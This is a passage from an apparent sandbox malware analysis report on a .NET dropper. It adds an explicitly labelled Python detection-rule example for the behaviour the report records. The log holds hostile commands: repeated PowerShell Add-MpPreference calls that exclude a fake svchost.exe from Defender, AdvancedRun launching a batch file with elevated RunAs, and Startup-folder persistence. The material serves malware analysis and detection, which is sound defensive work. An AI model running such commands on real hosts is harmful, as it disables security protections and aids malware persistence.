                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
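                      The process tree recorded above is the detection-relevant part of this section: a binary in the user's Startup folder, and its copy named svchost.exe under C:\Windows\Resources, each spawn powershell.exe to run Add-MpPreference -ExclusionPath for their own paths, and each drop the NirSoft AdvancedRun utility to a fresh GUID directory in %TEMP% to launch a test.bat through its /RunAs switch. Note also that the command lines name C:\Windows\System32\...\powershell.exe while the image actually created is the SysWOW64 copy, which is file-system redirection for a 32-bit parent (the sample loads the 32-bit native images of mscorlib). The following Python is an added example and not code from the report or from the sample: a small rule set that encodes those observations and runs over constructed process-creation records modelled on the lines above. The record layout, the sample events, the benign control event and the list of suspicious parent locations are assumptions; the AdvancedRun switch values are copied from the command lines as printed and their meaning is not documented on this page.

```python
"""Detection rules for the process-creation pattern shown above.

Added example, not part of the Joe Sandbox report. The record layout and the
sample events below are constructed to mirror the report lines.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon Event 1 / Security 4688 style)."""
    parent_image: str
    image: str
    command_line: str


# Add-MpPreference adding any exclusion type; captures the type and the value.
EXCLUSION_RE = re.compile(
    r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension|IpAddress)\s+"
    r"(?:'([^']*)'|\"([^\"]*)\"|(\S+))",
    re.IGNORECASE,
)
# AdvancedRun switches as they appear on the page: target file and /RunAs selector.
ADVRUN_TARGET_RE = re.compile(r"/EXEFilename\s+'([^']+)'", re.IGNORECASE)
ADVRUN_RUNAS_RE = re.compile(r"/RunAs\s+(\d+)", re.IGNORECASE)
SCRIPT_EXTS = (".bat", ".cmd", ".ps1", ".vbs", ".js")

# Parent locations from which spawning these tools is not expected (assumption).
SUSPICIOUS_PARENT_DIRS = (
    "\\microsoft\\windows\\start menu\\programs\\startup\\",
    "c:\\windows\\resources\\",
    "\\appdata\\local\\temp\\",
)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def first_token(command_line: str) -> str:
    """Image path as written on the command line (quoted or bare first token)."""
    m = re.match(r"""\s*(?:'([^']+)'|"([^"]+)"|(\S+))""", command_line)
    return (m.group(1) or m.group(2) or m.group(3)) if m else ""


def evaluate(events):
    """Return (rule, detail) pairs for every rule an event triggers."""
    findings = []
    for ev in events:
        cmd, child, parent = ev.command_line, basename(ev.image), ev.parent_image.lower()

        m = EXCLUSION_RE.search(cmd)
        if m and child in ("powershell.exe", "pwsh.exe"):
            value = m.group(2) or m.group(3) or m.group(4)
            findings.append(("defender_exclusion_added", f"{m.group(1)}={value}"))

        if child == "advancedrun.exe":
            target = ADVRUN_TARGET_RE.search(cmd)
            runas = ADVRUN_RUNAS_RE.search(cmd)
            if target and target.group(1).lower().endswith(SCRIPT_EXTS):
                mode = runas.group(1) if runas else "?"
                findings.append(("advancedrun_script_launch",
                                 f"runas={mode} target={target.group(1)}"))

        # Command line names \System32\ but the image ran from \SysWOW64\: file-system
        # redirection, i.e. the parent is a 32-bit process (as the x86 sample here is).
        if "\\system32\\" in first_token(cmd).lower() and "\\syswow64\\" in ev.image.lower():
            findings.append(("wow64_redirected_launch", ev.image))

        if any(d in parent for d in SUSPICIOUS_PARENT_DIRS):
            findings.append(("suspicious_parent_location", ev.parent_image))
    return findings


# Constructed records modelled on the report lines (not captured telemetry).
SAMPLE_EVENTS = [
    ProcEvent(
        parent_image=r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe",
        image=r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        command_line=r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference "
                     r"-ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force",
    ),
    ProcEvent(
        parent_image=r"C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe",
        image=r"C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe",
        command_line=r"'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' "
                     r"/EXEFilename 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat' "
                     r"/WindowState '0' /PriorityClass '32' /CommandLine '' /StartDirectory '' /RunAs 8 /Run",
    ),
    # Benign control: an interactive admin only reads the Defender configuration.
    ProcEvent(
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line=r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-MpPreference',
    ),
]

if __name__ == "__main__":
    for rule, detail in evaluate(SAMPLE_EVENTS):
        print(f"{rule:28} {detail}")
```

                      The exclusion rule fires on the cmdlet regardless of which path is excluded, because an attacker-chosen exclusion is the signal; the excluded value is reported so an analyst can remove it with Remove-MpPreference. On a real host the same Add-MpPreference call also produces Defender operational log event 5007, which does not depend on process telemetry having captured the command line.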
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe Code function: 6_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe Code function: 7_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe File created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe Code function: 6_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6408:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6164:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6840:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1100:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2244
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6276:120:WilError_01
                      Source: VknMvPoCXZ.exe, \u0039BD3B5D7/\u00364733196.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 481F404B.exe.1.dr, \u0039BD3B5D7/\u00364733196.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: svchost.exe.1.dr, \u0039BD3B5D7/\u00364733196.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 1.2.VknMvPoCXZ.exe.200000.0.unpack, \u0039BD3B5D7/\u00364733196.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 1.0.VknMvPoCXZ.exe.200000.0.unpack, \u0039BD3B5D7/\u00364733196.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 1.0.VknMvPoCXZ.exe.200000.13.unpack, \u0039BD3B5D7/\u00364733196.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 1.0.VknMvPoCXZ.exe.200000.15.unpack, \u0039BD3B5D7/\u00364733196.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 1.0.VknMvPoCXZ.exe.200000.1.unpack, \u0039BD3B5D7/\u00364733196.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 24.0.481F404B.exe.a50000.0.unpack, \u0039BD3B5D7/\u00364733196.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: VknMvPoCXZ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: VknMvPoCXZ.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                      Source: VknMvPoCXZ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: \REGISTRY\USER\S-1-5-21-3853321935-2125563209-4053062332-1002udio.DevOps.Telemetry.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: osymbols\dll\System.Windows.Forms.pdbvH source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Resources\new\Repo\Debug\private\RUNPE\JabrezRPE\JabrezRPE\obj\Debug\RunPE_MemoryProtection.pdb source: VknMvPoCXZ.exe, 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, 481F404B.exe, 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, svchost.exe, 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.PDBm source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbPROCESSOR_ARCHITEW6432=AMD64 source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: E:\A\_work\3592\s\out\Release\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: svchost.exe
                      Source: Binary string: ndel\??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: VknMvPoCXZ.exe, 00000001.00000000.508463732.0000000006E40000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\System.Windows.Forms.pdbpdbrms.pdb9- source: VknMvPoCXZ.exe, 00000001.00000000.508463732.0000000006E40000.00000004.00000001.sdmp
                      Source: Binary string: ease\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb1 source: VknMvPoCXZ.exe, 00000001.00000000.359026975.0000000000AC8000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb.Forms.pdbpdbrms.pdbm.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files\??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe\??\C:\Windows\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\System.Windows.Forms.pdbpdbrms.pdb\??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb25563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: VknMvPoCXZ.exe, 00000001.00000000.359026975.0000000000AC8000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdbUSERDOMAIN=computer source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbE> source: VknMvPoCXZ.exe, 00000001.00000000.400279978.0000000000AD8000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\VknMvPoCXZ.PDB source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb,U}< source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: E:\A\_work\3592\s\out\Release\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb@ source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdbease\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb\aero\Shell\4B6A7152\svch source: svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: ; .pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.508463732.0000000006E40000.00000004.00000001.sdmp
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, AdvancedRun.exe, 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000007.00000000.273104698.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbCOMPUTERNAME=computer source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdb+ source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb* source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: lib.pdb source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: E:\A\_work\3592\s\out\Release\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb9C-4437-8B11-F424491E3931}\Server source: svchost.exe, 00000028.00000002.588815197.0000000007E00000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdbDriverData=C:\Windows\System32\Drivers\DriverData source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb(m source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbs source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbZS!'~< source: VknMvPoCXZ.exe, 00000001.00000000.359026975.0000000000AC8000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdbpdbtry.pdb_ source: VknMvPoCXZ.exe, 00000001.00000002.568888200.0000000000A84000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdbS source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb(m source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: o.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: VknMvPoCXZ.PDB source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: symbols\dll\System.Windows.Forms.pdbvs. source: svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: iHC:\Windows\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb25563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: svchost.exe, 00000028.00000002.588815197.0000000007E00000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdbease\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdbM( source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: svchost.PDB source: svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe Code function: 6_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe Code function: 6_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe Code function: 6_2_0040B50D push ecx; ret
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe Code function: 7_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe Code function: 7_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe Code function: 7_2_0040B50D push ecx; ret
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe Code function: 6_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: VknMvPoCXZ.exe Static PE information: 0xDA8605A3 [Wed Mar 6 01:25:55 2086 UTC] (the PE TimeDateStamp lies in the future; on its own this is weak evidence, since deterministic .NET builds store a content hash in that field rather than a real compile time)

                      Persistence and Installation Behavior:

                      Drops executables to the windows directory (C:\Windows) and starts them
                      Source: unknown Executable created and started: C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe
